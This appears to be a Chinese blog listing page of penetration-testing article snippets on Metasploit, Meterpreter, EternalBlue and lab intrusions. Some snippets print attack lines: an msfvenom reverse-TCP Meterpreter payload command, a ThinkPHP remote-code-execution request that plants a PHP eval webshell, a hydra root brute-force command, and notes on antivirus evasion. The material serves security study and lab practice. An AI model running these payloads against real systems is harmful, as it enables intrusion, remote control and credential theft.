• 2024-06-14MSF渗透使用说明
    实验环境前提:对方的445端口必须开放,首先要保证是能够访问到目标机器的,那么我们先ping一下目标机器,看网络是否连通如果无法ping的话,对方机器必须要关闭防火墙,或许有其他方法在对方开启防火墙的情况下访问到对方?目前采用关闭防火墙使用工具:kali
  • 2024-06-06Hershell反向shell生成器+msf加密通信免杀
    转自:https://www.cnblogs.com/Chuantouli/p/12298579.html简介 Hershell1Hershell(<ahref="github.com/sysdream/hershell" target="_blank" rel="noopener">github.com/sysdream/hershell</a>)是基于golang开发的一款反向shell生成
  • 2024-05-31新型 Meterpreter 后门能够在图片中隐藏恶意代码
    据CyberSecurityNews消息,ANY.RUN沙盒分析了一种被称为Meterpreter的新型后门恶意软件,能利用复杂的隐写技术将恶意有效载荷隐藏在看似无害的图片文件中。基于Meterpreter的攻击从一个包含PowerShell脚本的.NET可执行文件开始,该脚本会从远程命令与控制(C2)服务器下载
  • 2024-05-31msf攻击windows实例
    环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msf(msfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)一、Nmap端口收集nmap-sV-T4 192.168.129.132(
  • 2024-05-03Metasploit-即时入门(全)
    Metasploit即时入门(全)原文:annas-archive.org/md5/FDEA350254319975F23617766073DAB6译者:飞龙协议:CCBY-NC-SA4.0第一章. 快速入门Metasploit欢迎阅读《快速入门Metasploit》。本书特别为您提供了设置Metasploit所需的所有信息。您将学习Metasploit的基础知识,开始
  • 2024-03-22Moonsec_Projet_7_Writeup
    Moonsec_Projet_71、基础介绍1.1网络拓扑图主机账号密码网卡IPWindowsServer2016administrator!@#QWE123vmnet17(web)|vmnet18192.168.0.144(www.moonlab.com)|10.10.1.131WindowsServer2012administrator!@#QWEasdvmnet18|vmnet1910.10.1.
  • 2024-03-03MSF渗透使用说明
    实验环境前提:对方的445端口必须开放,首先要保证是能够访问到目标机器的,那么我们先ping一下目标机器,看网络是否连通如果无法ping的话,对方机器必须要关闭防火墙,或许有其他方法在对方开启防火墙的情况下访问到对方?目前采用关闭防火墙使用工具:kali靶机:windowsser
  • 2023-12-08【THM】Metasploit: Meterpreter
    Meterpreter简介Meterpreter是一种Metasploit上的有效负载(payload),它通过许多有价值的组件支持渗透测试过程。Meterpreter将在目标系统上运行并充当命令和控制架构中的代理。使用Meterpreter时,你将与目标操作系统和文件进行交互,并能使用Meterpreter的专用命令。Meterpreter
  • 2023-11-26Meterpreter框架使用实验
     一.实验目的与配置了解漏洞复现的基本流程和方法熟悉永恒之蓝的漏洞原理及其利用熟悉Metasploit框架的使用及其相关的命令 二.实验环境Win7虚拟机一台,kali虚拟机一台 三.实验工具VMWare、NMap、Metasploit 四.实验步骤搭建测试环境,将kali作为攻击主机、win7_x
  • 2023-11-11后渗透
     1.生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.110.140lport=4444-fexe>shell.exe2.将生成的木马移动到/var/www/html目录下3.打开apache24.靶机和虚拟机相互ping5.靶机在网址上搜索192.168.40.129(虚拟机ip)/shell.exe下载文件6.打开msfc
  • 2023-11-01Metasploit使用教程-(反弹shell)
    Metasploit反弹shell 利用msfvenom生成一个反弹shell程序 msfvenom-lpayloads可以查看所有payloadWindows通用反向shell:windows/meterpreter/reverse  --基于TCP的反向链接反弹shell,使用起来很稳定。windows/meterpreter/reverse_http  --基于http方式的反
  • 2023-07-04Metasploit - Meterpreter研究
    一、meterpreter简介Meterpreter是一个功能强大的远程控制框架,常用于渗透测试和网络攻击中。它是Metasploit框架的一部分,Metasploit是一个流行的开源渗透测试工具集。Meterpreter提供了一个灵活的、模块化的平台,使攻击者能够在受攻击的系统上执行各种操作。Meterpreter具
  • 2023-06-301.1 Metasploit 工具简介
    Metasploit简称(MSF)是一款流行的开源渗透测试框架,由Rapid7公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和Payload工具,可用于漏洞利用、及漏洞攻击。同时软件自身支
  • 2023-06-301.1 Metasploit 工具简介
    Metasploit简称(MSF)是一款流行的开源渗透测试框架,由Rapid7公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和Payload工具,可用于漏洞利用、及漏洞攻击。同时软件自身支
  • 2023-06-24三层靶机内网渗透测试
    三层靶机内网渗透测试信息收集目标ip:192.168.31.145端口信息收集:nmap-A-T4-p- 192.168.31.145开放端口:21/22/80/111/888/3306/8888   操作系统:Liunx分析利用21/22端口--弱口令爆破hydra-vV-lroot-P/usr/share/wordlists/metasploit/password.lst 192.1
  • 2023-06-032023.6.3 自学kali渗透测试1
     首先sudosu进入根用户,然后msfconsole然后searchms_17_010 然后use0//使用0号模块 2.设置必选项 //require为yes的为必选项setRHOSTS[目的IP]    //前提是在同一局域网//*RHOSTS为targethost(s)代表你要攻击谁 setpayloadwindows/x64/meterperte
  • 2023-05-30记一次靶场渗透
    外围突破thinkphp5.0.22GET/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak.php&vars[1][]=%3C%3Fphp+%40eval%28%24_POST%5B%27code%27%5D%29%3BHTTP/1.1User-Agent:Mozilla/5.
  • 2023-05-0520201230张国强实验三
    免杀原理1.基础问题回答杀软是如何检测出恶意代码的?基于特征码的静态扫描技术在文件中寻找特定的十六进制字符串,如果找到,就可判定文件感染了某种病毒。启发式杀毒技术病毒要达到感染和破坏的目的,通常的行为都会有一定的行为和特征,所以可以通过分析相关的病毒指令,判
  • 2023-04-17ms17-010
    用nmap的漏洞扫描模式nmap--script=vuln192.168.178.128可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。 打开metasploit(msf很有意思的是,每次打开都会显示不同的画面。)msfconsole 搜索ms17-010相关模块,可以看到一共找到了6个不同的模块。(选项:0-5)searchms17-010
  • 2023-04-16msf
    MSF——基本使用和Exploit模块(一)–走看看(zoukankan.com)1、介绍matasploit,简称msf,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。msfconsole2、永恒之蓝永恒之蓝2017年4月4日黑客团体Brokeers影子经纪人网络攻
  • 2023-01-14PHP后门反弹演示
    准备一台kali虚拟机一台win11物理机phpstudy开启Nginx和Mysqlphpstudy中已经搭建好DVWA靶场DVWA靶场的安全等级调整值low​注意:需要将杀毒软件个关了,否则有提示,黑
  • 2023-01-10永恒之蓝以及MSF常用操作
    首先按CTEL+ATL+T打开终端进入管理员控制,输入myfconsole进入metasploit(MSF)查找永恒之蓝(编码为ms17-010)输入searchms17-010这里主要是使用msf的exploit(攻击模块)和auxi
  • 2022-12-2307-MSF PAYLOAD模块
    1环境搭建Windowsserver2008R2Datacenter:192.168.5.128kalilinux:192.168.5.1362在kali上使用MSFPayload生成病毒生成1.exe病毒文件。msfvenom-pwindows/met
  • 2022-11-27CobaltStrike注入MSF会话
    本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关准备工作kali机开启CS服务器Win10开启msf、CS客户端Win7充当一台靶机  第一步:利用msfve
  • 2022-11-27CobaltStrike注入MSF会话
    本文只是交流学习心得,如果被拿去做违法乱纪的事情,请自行负责,与作者无关准备工作kali机开启CS服务器Win10开启msf、CS客户端Win7充当一台靶机  第一步:利用msfve